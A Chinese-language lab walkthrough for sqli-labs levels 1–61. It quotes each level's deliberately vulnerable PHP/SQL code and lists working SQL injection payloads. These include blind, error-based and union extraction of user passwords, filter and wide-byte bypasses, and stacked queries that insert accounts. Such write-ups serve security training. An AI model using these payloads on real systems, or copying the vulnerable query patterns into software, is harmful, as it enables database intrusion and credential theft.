sqli-less 筆記

託帕發表於2018-08-03

一 '
?id=1'
?id=1' and 1=1%23
?id=1' and 1=2%23

二數值
?id=1'
?id=1 and 1=1%23
?id=1 and 1=2%23

三 ')
?id=1'。
?id=1') and 1=1%23
?id=1') and 1=2%23

四 ")
?id=1")
?id=1") and 1=1%23
?id=1") and 1=2%23

五 ' 報錯
1' and updatexml(1,concat(0x23,(database())),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

六 " 報錯
1" and updatexml(1,concat(0x23,(database())),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

七 ')) 盲注
1')) and length(database())=8 %23 //求資料庫的長度
1')) and ascii(substr(database(),1,1))=115%23 //求資料庫名的ascii值
1')) and (select count(table_name) from information_schema.tables where table_schema='security')=4%23 //求表的數量
1')) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23 //求表名的ascii碼值
1')) and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23 //求列的數量
1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 %23 //求列名的ascii碼值
1')) and (select count(username) from security.users)=13 %23 //求欄位的內容
1')) and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23 //求欄位的ascii碼值

八 ' 盲注
（參考七）

九 ' 時間型盲注
?id=1' and if(length(database())>10,sleep(0),sleep(5))%23

十 " 時間型盲注
（參考九）

十一 '報錯
@$sql="SELECT username,password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
username輸入：admin
password輸入：admin' and updatexml(1,concat(0x23,(database())),0)#
admin' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)#

十二 ")報錯
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
username輸入：admin
password輸入：1") and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)

十三 ')報錯
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
username輸入：admin
password輸入：admin') and updatexml(1,concat(0x7e,(database())),0)#
（參考十一）

十四 "報錯
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
username輸入：admin
password輸入：admin" and updatexml(1,concat(0x7e,(database())),0)#
（參考十一）

十五 '（布林型、時間）盲注
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1;
username輸入：admin
password輸入：admin' and sleep(if(length(database())>10,0,5))#

十六 "(布林型、時間）盲注
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1;
username輸入：admin
password輸入：admin") and sleep(if(length(database())>10,0,5))#

十七報錯
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
username admin
password admin' or updatexml(1,concat(0x7e,(database())),0) or '1

十八 User-Agent報錯 burp攔截
username admin
password admin
$uagent = $_SERVER['HTTP_USER_AGENT'];
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
uagent後加 1' or updatexml(1,concat(0x7e,(database())),0) or '

十九 referer報錯 burp攔截
$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
referer後加 1' or updatexml(1,concat(0x7e,(database())),0) or '

二十 ' burp攔截聯合查詢
第一步：用某一個賬號aaa登入成功
第二步：重新整理頁面，用burp攔截，修改cookie欄位
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
在uname=aaa後輸入 ' order by 3%23
在uname=aaa後輸入 ' and 1=2 union select 1,2,3%23
在uname=aaa後輸入 ' and 1=2 union select 1,database(),3%23
在uname=aaa後輸入 ' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
在uname=aaa後輸入 ' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
在uname=aaa後輸入 ' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

二十一 ') burp攔截聯合查詢
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
與二十題基本相似，不同的是，閉合條件為單引號加括號，cookie中uname編碼為base64
uname=aaa') order by 3# -> uname=YWEnKSBvcmRlciBieSAzIw==
uname=aaa') and 1=2 union select 1,2,3# -> uname=YWFhJykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMj
uname=') and 1=2 union select 1,2,database()# -> uname=JykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
（參考二十）

二十二 " burp攔截聯合查詢
$cookee = $_C
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
與二十一題基本相似，不同的是，閉合條件為雙引號
（參考二十一）

二十三 ' 聯合查詢
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,2,'3
1' and 1=2 union select 1,database(),'3
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users where '1'='1

二十四
使用者註冊login_create.php
$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";、
username輸入：admin'#
password隨意

使用者登入login.php
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

密碼修改pass_change.php
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
二次排序注入

二十五聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
   $id= preg_replace('/or/i',"", $id);
   $id= preg_replace('/AND/i',"", $id);

   return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' anandd 1=2 union select 1,2,'3
1' anandd 1=2 union select 1,database(),'3
1' anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security
1' anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users
1' anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users where '1'='1

二十五a 聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
   $id= preg_replace('/or/i',"", $id);
   $id= preg_replace('/AND/i',"", $id);

   return $id;
}
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=1 oorr updatexml(1,concat(0x23,database()),1) %23 LIMIT 0,1";

1 oorrder by 3%23
1 anandd 1=2 union select 1,2,3%23
1 anandd 1=2 union select 1,database(),3%23
1 anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'%23
1 anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'%23
1 anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users%23

二十六聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
   $id= preg_replace('/or/i',"", $id);           //strip out OR (non case sensitive)
   $id= preg_replace('/and/i',"", $id);       //Strip out AND (non case sensitive)
   $id= preg_replace('/[\/\*]/',"", $id);       //strip out /*
   $id= preg_replace('/[--]/',"", $id);       //Strip out --
   $id= preg_replace('/[#]/',"", $id);           //Strip out #
   $id= preg_replace('/[\s]/',"", $id);       //Strip out spaces
   $id= preg_replace('/[\/\\\\]/',"", $id);       //Strip out slashes
   return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name='users
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,group_concat(username,0x23,passwoorrd)%0Bfrom%0Bsecurity.users%0Bwhere%0B'1'='1

二十六a聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
   $id= preg_replace('/or/i',"", $id);           //strip out OR (non case sensitive)
   $id= preg_replace('/and/i',"", $id);       //Strip out AND (non case sensitive)
   $id= preg_replace('/[\/\*]/',"", $id);       //strip out /*
   $id= preg_replace('/[--]/',"", $id);       //Strip out --
   $id= preg_replace('/[#]/',"", $id);           //Strip out #
   $id= preg_replace('/[\s]/',"", $id);       //Strip out spaces
   $id= preg_replace('/[\/\\\\]/',"", $id);       //Strip out slashes
   return $id;
}
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0B infoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name=('users
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(username,0x23,passwoorrd),3%0bfrom%0bsecurity.users%0bwhere%0b('1'='1

二十七
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);       //strip out /*
$id= preg_replace('/[--]/',"", $id);       //Strip out --.
$id= preg_replace('/[#]/',"", $id);           //Strip out #.
$id= preg_replace('/[ +]/',"", $id);   //Strip out spaces.
$id= preg_replace('/select/m',"", $id);   //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);   //Strip out spaces.
$id= preg_replace('/union/s',"", $id);   //Strip out union
$id= preg_replace('/select/s',"", $id);   //Strip out select
$id= preg_replace('/UNION/s',"", $id);   //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);   //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);   //Strip out Union
$id= preg_replace('/Select/s',"", $id);   //Strip out select
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name='users
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B'1'='1

二十七a
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2, "3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),"3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema="security
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name="users
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B"1"="1

二十八
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);               //strip out /*
$id= preg_replace('/[--]/',"", $id);               //Strip out --.
$id= preg_replace('/[#]/',"", $id);                   //Strip out #.
$id= preg_replace('/[ +]/',"", $id);           //Strip out spaces.
//$id= preg_replace('/select/m',"", $id);             //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);           //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);   //Strip out UNION & SELECT.
return $id;
}
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name=('users
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0Bsecurity.users%0Bwhere%0B('1'='1

二十八a
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id);               //strip out /*
//$id= preg_replace('/[--]/',"", $id);               //Strip out --.
//$id= preg_replace('/[#]/',"", $id);                   //Strip out #.
//$id= preg_replace('/[ +]/',"", $id);           //Strip out spaces.
//$id= preg_replace('/select/m',"", $id);             //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id);           //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);   //Strip out spaces.
return $id;
}
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band%0btable_name=('users
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,password),3%0Bfrom%0B security.users%0Bwhere%0B('1'='1

二十九
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1" order by 3%23
1" and 1=2 union select 1,2,3%23
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1" and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十一
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id= ($id) LIMIT 0,1";
1") order by 3%23
1") and 1=2 union select 1,2,3%23
1") and 1=2 union select 1,database(),3%23
1") and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1") and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1") and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十二寬位元組注入
$id=check_addslashes($_GET['id']);
function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);
$string = preg_replace('/\'/i', '\\\'', $string);
$string = preg_replace('/\"/', "\\\"", $string);
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十三
$id=check_addslashes($_GET['id']);
function check_addslashes($string)
{
$string= addslashes($string);
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十四聯合 burp攔截
$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];
$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
0x61646d696e(admin)
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23

三十五
$string = addslashes($string);
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十六 MYSQL檔案裡面的my.ini裡面的gbk改為Latin1
$id=check_quotes($_GET['id']);
function check_quotes($string)
{
$string= mysql_real_escape_string($string);
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十七 burp攔截
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23

三十八 ' 基於聯合查詢的堆疊注入
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
1';insert into users(username,password) values('less38','less38')%23

三十九數值
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
（參考三十八）

四十 ')
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
1') order by 3%23
1') and 1=2 union select 1,2,3%23
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1') and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
（參考三十八）

四十一
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
（參考三十八）

四十二堆疊注入報錯
Login
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
賬號隨意
密碼 a';create table W like users# //新增表
密碼 a';insert into users values(20,'xj','xj123')# //新增賬號密碼
登入進去修改密碼

四十三
Login
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(21,'xj','xj123')#
同上

四十四
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
a';insert into users values(22,'w','w')#
同上

四十五
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(23,'j','j')#
同上

四十六報錯
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 desc 或者asc，顯示結果不同，表明可以注入
sort=1 and updatexml(1,concat(0x23,database()),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1) 顯示不完全

四十七
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and updatexml(1,concat(0x23,database()),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23 顯示不完全

四十八錯誤不回顯時間盲注
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23

四十九錯誤不回顯時間盲注
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十時間盲注堆疊注入（參考上面）
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23

五十一時間盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十二時間盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23

五十三時間盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十四
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//sj7vpktxiq
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='sj7vpktxiq'%23
//id,sessid,secret_TXLH,tryy
1' and 1=2 union select 1,group_concat(sessid),3 from challenges.sj7vpktxiq%23
//d1c38a09acc34845c6be3a127a5aacaf
1' and 1=2 union select 1,group_concat(secret_TXLH),3 from challenges.sj7vpktxiq%23
//DwhfpvM0dzKLEqw9hi3PeJzY

五十五
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1) and 1=2 union select 1,database(),3%23
1) and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//xwflfwldpp
1) and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='xwflfwldpp'%23
//id,sessid,secret_DMUI,tryy
1)and 1=2 union select 1,group_concat(secret_DMUI),3 from challenges.xwflfwldpp%23
//YBNwglaRUDwbJ1Ze082Ju1Sn

五十六
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//z4d4ffn83s
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='z4d4ffn83s'%23
//id,sessid,secret_Y8GA,tryy
1') and 1=2 union select 1,group_concat(secret_Y8GA),3 from challenges.z4d4ffn83s%23
//PsQNyhePjSzrPUvoEdQruEx6

五十七
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//4i3eu5w9m5
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='4i3eu5w9m5'%23
//id,sessid,secret_YZ8G,tryy
1" and 1=2 union select 1,group_concat(secret_YZ8G),3 from challenges.4i3eu5w9m5%23
//kExPbOrEz78G0bfUGYmNpEJs

五十八
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and updatexml(1,concat(0x23,database()),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//5z3vsai61i
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5z3vsai61i')),1)%23
//id,sessid,secret_C8ER,tryy
1' and updatexml(1,concat(0x23,(select group_concat(secret_C8ER)from challenges.5z3vsai61i)),1)%23
//hmgTXQczwr2neRRzr1m9JvWO

五十九
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1 and updatexml(1,concat(0x23,database()),1)%23
1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//h6hi5xoec7
1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='h6hi5xoec7
')),1)%23
//id,sessid,secret_AI69,tryy
1 and updatexml(1,concat(0x23,(select group_concat(secret_AI69)from challenges.h6hi5xoec7)),1)%23
//0g7eQdUtHCmXtr4o8ZySKoYg

六十
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1") and updatexml(1,concat(0x23,database()),1)%23
1") and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//uw2q08bttr
1") and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='uw2q08bttr')),1)%23
//id,sessid,secret_BUFB,tryy
1") and updatexml(1,concat(0x23,(select group_concat(secret_BUFB)from challenges.uw2q08bttr)),1)%23
//yJSBxWNO7xmCvhsQNNOQu2Y2

六十一
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
1')) and updatexml(1,concat(0x23,database()),1)%23
1')) and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//avy2e9297x
1')) and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='avy2e9297x
')),1)%23
//id,sessid,secret_NSKU,tryy
1')) and updatexml(1,concat(0x23,(select group_concat(secret_NSKU)from challenges.avy2e9297x)),1)%23
